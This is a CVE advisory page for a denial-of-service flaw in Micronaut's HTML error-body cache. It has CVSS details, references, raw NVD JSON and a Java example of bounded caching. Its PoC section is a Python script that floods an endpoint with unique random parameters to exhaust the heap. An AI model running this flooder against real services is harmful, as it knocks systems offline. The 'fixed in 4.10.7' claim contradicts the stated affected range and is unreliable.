Security Vulnerability Report
CVE-2026-33012 CVSS 7.5 HIGH

CVE-2026-33012

Published: 2026-03-20 05:16:15
Last Modified: 2026-03-24 21:21:45

Description

Micronaut Framework is a JVM-based full-stack Java framework designed for building modular, easily testable JVM applications. Versions 4.7.0 through 4.10.16 used an unbounded ConcurrentHashMap cache with no eviction policy in its DefaultHtmlErrorResponseBodyProvider. If the application throws an exception whose message may be influenced by an attacker (for example, one that includes request query parameter values), remote attackers could use it to cause unbounded heap growth and an OutOfMemoryError, leading to DoS. This issue has been fixed in version 4.10.7.
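To make the reported pattern concrete from the defender's side, the following Java illustration is added here; it is not Micronaut's code and not its actual fix. It contrasts a cache keyed on the raw exception message with no eviction (the shape the description gives) against a bounded, evicting variant. The class names, the buildHtml stand-in and the 256-entry cap are assumptions made for the example.

```java
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Illustrative only (not Micronaut's code): contrasts the unbounded cache
// pattern described in the advisory with a bounded, evicting variant.
public class ErrorBodyCacheDemo {

    // Vulnerable pattern: ConcurrentHashMap keyed on the raw exception message,
    // never evicted. Each distinct (possibly attacker-influenced) message is a
    // new entry, so heap use grows with request diversity until OutOfMemoryError.
    static final class UnboundedCache {
        private final Map<String, String> cache = new ConcurrentHashMap<>();

        String render(Throwable error) {
            // String.valueOf guards against a null message (ConcurrentHashMap rejects null keys)
            return cache.computeIfAbsent(String.valueOf(error.getMessage()), ErrorBodyCacheDemo::buildHtml);
        }

        int size() {
            return cache.size();
        }
    }

    // Hardened pattern: an access-ordered LinkedHashMap that evicts its eldest
    // entry once the cap is exceeded, so memory stays constant however many
    // distinct messages arrive. Collections.synchronizedMap makes it thread-safe.
    static final class BoundedCache {
        private final Map<String, String> cache;

        BoundedCache(int maxEntries) {
            this.cache = Collections.synchronizedMap(new LinkedHashMap<String, String>(16, 0.75f, true) {
                @Override
                protected boolean removeEldestEntry(Map.Entry<String, String> eldest) {
                    return size() > maxEntries;
                }
            });
        }

        String render(Throwable error) {
            return cache.computeIfAbsent(String.valueOf(error.getMessage()), ErrorBodyCacheDemo::buildHtml);
        }

        int size() {
            return cache.size();
        }
    }

    // Stand-in (assumed) for the HTML rendering a real provider would do; escapes
    // the message so it is safe to embed in an error page.
    static String buildHtml(String message) {
        String escaped = message
                .replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;");
        return "<html><body><h1>Error</h1><p>" + escaped + "</p></body></html>";
    }

    public static void main(String[] args) {
        UnboundedCache unbounded = new UnboundedCache();
        BoundedCache bounded = new BoundedCache(256);

        // Constructed input: 100,000 distinct messages, the same effect a stream of
        // requests with unique query values would have on a message-keyed cache.
        for (int i = 0; i < 100_000; i++) {
            Throwable t = new IllegalArgumentException("bad input #" + i);
            unbounded.render(t);
            bounded.render(t);
        }

        System.out.println("unbounded cache entries: " + unbounded.size());
        System.out.println("bounded cache entries:   " + bounded.size());
    }
}
```

Run with `javac ErrorBodyCacheDemo.java && java ErrorBodyCacheDemo`: the unbounded count tracks the loop bound while the bounded count stays at the cap, which is the whole difference between a cache that an input stream can fill and one it cannot. The operational remedy for this report is upgrading Micronaut past the affected range; the bounded variant shows the general property a reviewer should look for in any cache keyed on request-derived data (a cap, an eviction rule, or a key that does not vary with attacker input).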

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:objectcomputing:micronaut:*:*:*:*:*:*:*:* - VULNERABLE
Micronaut Framework 4.7.0 - 4.10.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import random
import string


def generate_random_string(length=100):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))


def exploit(target_url):
    print(f"[+] Targeting {target_url}")
    try:
        while True:
            # Generate a unique long parameter to fill the cache
            payload = generate_random_string(200)
            # Assuming the endpoint echoes back the param or causes an error with it
            url = f"{target_url}?input={payload}"
            response = requests.get(url, timeout=5)
            print(f"Sent request with payload length {len(payload)}, Status: {response.status_code}")
    except KeyboardInterrupt:
        print("\n[-] Exploit stopped by user")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Replace with actual vulnerable endpoint
    target = "http://localhost:8080/error"
    exploit(target)

References

https://github.com/micronaut-projects/micronaut-core/commit/1e2ba2c14386af3d47751732d02053a72b0b49b3 (Patch)
https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.17 (Release Notes)
https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-2hcp-gjrf-7fhc (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33012", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:15.200", "lastModified": "2026-03-24T21:21:44.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. Versions 4.7.0 through 4.10.16 used an unbounded ConcurrentHashMap cache with no eviction policy in its DefaultHtmlErrorResponseBodyProvider. If the application throws an exception whose message may be influenced by an attacker, (for example, including request query value parameters) it could be used by remote attackers to cause an unbounded heap growth and OutOfMemoryError, leading to DoS. This issue has been fixed in version 4.10.7."}, {"lang": "es", "value": "Micronaut Framework es un framework Java de pila completa basado en JVM diseñado para construir aplicaciones JVM modulares y fácilmente testeables. Las versiones 4.7.0 a la 4.10.16 usaban una caché ConcurrentHashMap ilimitada sin política de desalojo en su DefaultHtmlErrorResponseBodyProvider. Si la aplicación lanza una excepción cuyo mensaje puede ser influenciado por un atacante, (por ejemplo, incluyendo parámetros de valor de consulta de solicitud) podría ser usado por atacantes remotos para causar un crecimiento de heap ilimitado y OutOfMemoryError, lo que lleva a DoS. Este problema ha sido solucionado en la versión 4.10.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:objectcomputing:micronaut:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.7.0", "versionEndExcluding": "4.10.17", "matchCriteriaId": "C50C427C-305C-4A11-A5F5-E1AEB19AD09D"}]}]}], "references": [{"url": "https://github.com/micronaut-projects/micronaut-core/commit/1e2ba2c14386af3d47751732d02053a72b0b49b3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.17", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-2hcp-gjrf-7fhc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}